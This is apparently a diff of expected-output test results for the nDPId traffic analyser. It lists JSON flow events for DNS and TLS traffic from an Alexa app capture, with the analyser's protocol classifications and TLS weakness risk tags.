-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
-00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976115905,"flow_last_seen":1490976120950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10788,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976088605,"flow_last_seen":1490976094930,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":1938,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1490976088631,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":18884,"flow_avg_l4_payload_len":385,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976088937,"flow_last_seen":1490976110046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12258,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1490976088958,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12771,"flow_avg_l4_payload_len":304,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45712,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976089227,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8016,"flow_avg_l4_payload_len":296,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976089239,"flow_last_seen":1490976111839,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10466,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45715,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976114885,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4039,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976114894,"flow_last_seen":1490976116921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2723,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976114906,"flow_last_seen":1490976117017,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4615,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976114921,"flow_last_seen":1490976117016,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2611,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976114940,"flow_last_seen":1490976120960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5531,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976030894,"flow_last_seen":1490976194743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13865,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.22.185","src_port":53682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00810{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976150029,"flow_last_seen":1490976164211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":698,"flow_tot_l4_payload_len":2962,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976158680,"flow_last_seen":1490976164214,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2813,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45751,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976114879,"flow_last_seen":1490976114880,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":20922,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1490976169531,"flow_last_seen":1490976175920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2883,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45752,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195921,"flow_last_seen":1490976195980,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976187242,"flow_last_seen":1490976187508,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":59908,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} 
+00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976029756,"flow_last_seen":1490976171313,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5024,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00932{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976165062,"flow_last_seen":1490976175921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1290,"flow_tot_l4_payload_len":3345,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195484,"flow_last_seen":1490976195524,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14934,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":158,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976196840,"flow_last_seen":1490976196938,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":2707,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976093238,"flow_last_seen":1490976093355,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":119,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41639,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 